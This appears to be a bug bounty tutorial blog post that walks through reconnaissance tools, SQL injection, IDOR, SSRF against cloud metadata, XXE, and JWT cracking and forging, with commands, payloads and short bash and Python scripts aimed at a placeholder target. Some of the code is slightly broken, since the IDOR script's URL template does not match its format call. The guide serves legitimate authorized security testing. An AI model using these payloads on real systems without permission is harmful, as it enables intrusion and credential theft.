Listen to this Post
Introduction:
The path from a novice to a successful bug bounty hunter is paved with persistence, strategy, and a deep understanding of common vulnerability classes. While many are drawn to the field by the allure of high-value rewards, sustained success requires a methodical approach to target selection, reconnaissance, and exploitation. This guide demystifies that journey, providing the technical arsenal needed to advance from informational findings to critical P1 and P2 vulnerabilities.
Learning Objectives:
- Master the core reconnaissance methodology for expanding your attack surface.
- Understand and exploit common vulnerability chains in modern web applications.
- Learn to weaponize findings for maximum impact and bounty value.
You Should Know:
1. Passive Reconnaissance: The Art of Digital Footprinting
Effective hunting begins with intelligence gathering. Passive reconnaissance allows you to map a target’s external presence without sending a single packet to their servers directly.
Verified Commands & Tools:
Subdomain enumeration using Amass (Passive Mode) amass enum -passive -d target.com -o domains.txt Discovering assets via Project Discovery's Chaos chaos -d target.com -o chaos_domains.txt Using Subfinder for fast subdomain discovery subfinder -d target.com -o subfinder_domains.txt Fetching known URLs from Wayback Machine waybackurls target.com > urls.txt Using GitHub search for exposed secrets and code (GitHub CLI) gh api -X GET search/code -f q='target.com password' --jq '.items[].html_url'
Step-by-step guide:
First, install the tools via your package manager (e.g., apt, brew). Run `amass` in passive mode to gather subdomains from public sources without direct interaction. Combine the results from `subfinder` and `chaos` into a master list. Use `waybackurls` to extract historical endpoints and parameters from the Wayback Machine. Finally, leverage GitHub’s code search with the `gh` CLI to scan for accidentally committed API keys, passwords, or internal infrastructure references related to your target. This layered approach ensures a comprehensive view of the attack surface.
2. Active Reconnaissance: Probing the Live Surface
Once you have a list of domains and URLs, active reconnaissance involves interacting with the targets to discover live hosts, open ports, and running services.
Verified Commands & Tools:
Probing for HTTP/HTTPS services with Httpx cat domains.txt | httpx -silent -ports 80,443,8080,8443 -o live_hosts.txt Fast TCP port scanning with Naabu naabu -list domains.txt -top-ports 1000 -o naabu_ports.txt Web application fuzzing with FFuf for directories ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc all -o dir_scan.json Fuzzing for virtual hosts with FFuf ffuf -u https://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -mc all -fr "not-found"
Step-by-step guide:
Feed your list of domains into `httpx` to identify which hosts are alive and responding on common web ports. Use `naabu` for a broader TCP port scan to uncover non-HTTP services like databases (port 3306), SSH (port 22), or custom API ports. With your list of live web hosts, begin fuzzing for directories and files using FFuf. The virtual host fuzzing technique is critical for uncovering hidden sites or development/staging environments hosted on the same IP address.
3. Identifying Common Vulnerability Classes: SQL Injection
SQL Injection remains a high-impact vulnerability, especially when found in authenticated portions of an application or chained with other issues.
Verified Command & Code Snippet:
Using SQLmap to test a parameter sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=3 Manual testing payload for a numeric parameter curl -s "https://target.com/products?id=1' OR '1'='1'--"
-- Union-based SQLi payload to determine the number of columns ' ORDER BY 1-- ' UNION SELECT 1,2,3--
Step-by-step guide:
After identifying a parameter (like id, user, or category), start with a simple single quote (') to test for error-based SQLi. If an error is returned, proceed with more sophisticated payloads. Use the `ORDER BY` clause to incrementally determine the number of columns. Once known, use the `UNION SELECT` statement to extract data from the database. For automated and thorough testing, `sqlmap` can enumerate database names, tables, and even execute operating system commands in advanced cases. Always ensure you have explicit permission before using automated tools.
- Exploiting Access Control Flaws: IDOR & Broken Object-Level Authorization
Insecure Direct Object References (IDOR) are classic P2/P3 vulnerabilities that can often be escalated to P1 by demonstrating impact on other users’ data.
Verified Command & Code Snippet:
Manipulating a direct object reference with curl curl -H "Authorization: Bearer <your_token>" https://api.target.com/v1/users/12345/profile Testing for horizontal privilege escalation curl -H "Authorization: Bearer <your_token>" https://api.target.com/v1/users/12346/profile Testing for vertical privilege escalation by accessing an admin endpoint curl -H "Authorization: Bearer <your_token>" https://api.target.com/v1/admin/users
GET /api/v1/invoices/1001 HTTP/1.1 Host: target.com Authorization: Bearer <user_jwt_token>
Step-by-step guide:
While using the application, note any endpoints that use an obvious identifier (user ID, account number, document ID). Authenticate to the application and capture your own request. Systematically change the identifier in the request (e.g., from `1001` to 1002). If you can access another user’s data, you have found a valid IDOR. To increase the severity, attempt to access administrative endpoints or functions by guessing the path or modifying your JWT token claims if they are poorly validated.
- Server-Side Request Forgery (SSRF): From Internal Recon to Cloud Metadata Exploitation
SSRF vulnerabilities can be devastating, allowing attackers to probe and interact with internal systems, often leading to P1 ratings.
Verified Command & Code Snippet:
Testing for basic SSRF
curl -X POST https://target.com/webhook -H "Content-Type: application/json" -d '{"url":"http://localhost:8080"}'
Attempting to access cloud instance metadata
AWS EC2
curl -X POST https://target.com/fetch -d 'url=http://169.254.169.254/latest/meta-data/'
GCP
curl -X POST https://target.com/fetch -d 'url=http://metadata.google.internal/computeMetadata/v1/' -H 'Metadata-Flavor: Google'
<!-- Testing with XXE to achieve SSRF --> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]> <data>&xxe;</data>
Step-by-step guide:
Identify functionality that fetches external resources: webhooks, image uploads, document processors, or API endpoints that take a URL parameter. Start by trying to make the server call back to a service you control (using Burp Collaborator or a webhook.site URL). If successful, attempt to access internal resources like localhost, the internal network gateway (192.168.1.1), or cloud provider metadata endpoints. The ability to retrieve IAM roles or access keys from the metadata service is typically a critical (P1) finding.
6. JWT Vulnerabilities: Bypassing Authentication
JSON Web Tokens (JWT) are ubiquitous, and misconfigurations in their validation can lead to full authentication bypass.
Verified Command & Code Snippet:
Decoding a JWT token manually or using jwt.io echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c" | base64 -d Using John The Ripper to crack a weak JWT secret echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c' > jwt.txt john --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt
Python script to forge a JWT token with the "none" algorithm
import jwt
forged_token = jwt.encode({"user": "admin"}, algorithm="none", key="")
print(forged_token)
Step-by-step guide:
Capture a JWT token from the application. Decode it (the first two parts are base64url-encoded) to inspect its header and payload. Check the `alg` field in the header. If it is set to none, you can simply remove the signature and send the token. If a weak secret is suspected, use a tool like `john` with a wordlist to crack it. Also, test for algorithm confusion attacks by changing the `alg` from `RS256` to `HS256` and using the public key as the HMAC secret.
7. Automating the Workflow: Scripting for Efficiency
The most successful hunters automate repetitive tasks to focus on complex vulnerability chains.
Verified Command & Code Snippet:
!/bin/bash Basic recon and live host check script domain=$1 echo "[+] Starting reconnaissance for $domain" subfinder -d $domain -o subfinder_$domain.txt amass enum -passive -d $domain -o amass_$domain.txt cat subfinder_$domain.txt amass_$domain.txt | sort -u > all_subs_$domain.txt echo "[+] Probing for live hosts..." httpx -l all_subs_$domain.txt -ports 80,443,8080,8443,3000 -o live_$domain.txt echo "[+] Scanning for open ports..." naabu -list all_subs_$domain.txt -top-ports 100 -o ports_$domain.txt echo "[+] Recon complete. Live hosts: live_$domain.txt"
Python script to check for IDOR on a list of endpoints
import requests
def test_idor(url_template, token, id_list):
headers = {'Authorization': f'Bearer {token}'}
for id in id_list:
r = requests.get(url_template.format(id=id), headers=headers)
if r.status_code == 200:
print(f"[!] Possible IDOR: {url_template.format(id=id)}")
Usage
test_idor('https://api.target.com/user/{}', 'your_jwt_token_here', range(100, 110))
Step-by-step guide:
Create a bash script (like the one above) to automate the initial reconnaissance phase. Save it as recon.sh, give it execute permissions (chmod +x recon.sh), and run it with your target domain (./recon.sh example.com). For vulnerability-specific checks, a simple Python script can automate testing for issues like IDOR across a range of object IDs. This frees up significant time for manual testing of complex business logic flaws.
What Undercode Say:
- Depth Over Breadth: As highlighted by the hunter’s journey, mastering a single program for an extended period yields far better results than superficial testing across dozens. You develop an intimate knowledge of the application’s architecture, business logic, and where its weak points are likely to be.
- Persistence is a Weapon: The transition from “Not Applicable” and “Duplicate” to valid P3, P2, and eventually P1 findings is a universal trajectory. The key differentiator is not innate skill but the resilience to continue learning from rejections and refining your methodology.
The bug bounty landscape is not a get-rich-quick scheme but a professional field requiring a hacker’s mindset and an engineer’s discipline. The most critical vulnerabilities are often not found by a single clever payload but by chaining smaller, seemingly insignificant flaws—an IDOR here, an open redirect there—into a full-chain exploit. The tools and commands provided are the brush and chisel, but the hunter’s strategic focus and tenacity are the true art.
Prediction:
The future of bug bounties will be dominated by AI-assisted hunting, both on the offensive and defensive sides. AI will automate the initial vulnerability discovery phase, pushing human hunters to focus on complex, multi-step logic flaws and novel attack vectors that machines cannot yet comprehend. Furthermore, as applications become more complex and shift towards API-first and serverless architectures, vulnerabilities in business logic, authorization schemes, and cloud service misconfigurations will become the primary source of critical bounties, surpassing traditional web vulnerabilities like XSS and basic SQLi. The hunters who adapt to this complexity and learn to exploit the interactions between modern microservices will be the most successful.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Madhavan77777 Bugcrowd – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
